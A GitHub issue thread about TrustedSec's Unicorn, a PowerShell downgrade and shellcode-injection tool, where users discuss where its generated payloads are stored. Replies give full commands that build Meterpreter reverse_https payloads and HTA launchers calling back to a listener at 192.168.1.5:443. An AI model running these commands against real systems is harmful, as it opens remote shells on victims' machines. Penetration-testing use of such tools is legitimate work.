trustedsec / unicorn

Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
https://www.trustedsec.com

This is a dumb question, but where are my payloads located? #97

Closed r3x07 closed 5 years ago

r3x07 commented 5 years ago

I want to know the place my payloads are located.

myexploit commented 5 years ago
  1. Run the PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443

  2. This creates two files: one named powershell_attack.txt, which contains the PS one-liner payload, and a second named unicorn.rc, which contains the syntax for the MSF windows/meterpreter/reverse_https handler.

myexploit commented 5 years ago

If you opt for the HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta, it creates a folder titled hta_attack with three files stored in it: index.html, Launcher.hta and unicorn.rc. Launcher.hta contains the payload, index.html references and launches Launcher.hta, and unicorn.rc again is your MSF handler.

r3x07 commented 5 years ago

Wait, so it means it only works with reverse_https, but not reverse_tcp, right?

myexploit commented 5 years ago

Not sure, to be honest. I only ever used it with reverse_https, sorry.

r3x07 commented 5 years ago

K

trustedsec commented 5 years ago

Reverse_tcp is fine as well. Any Metasploit payload, really.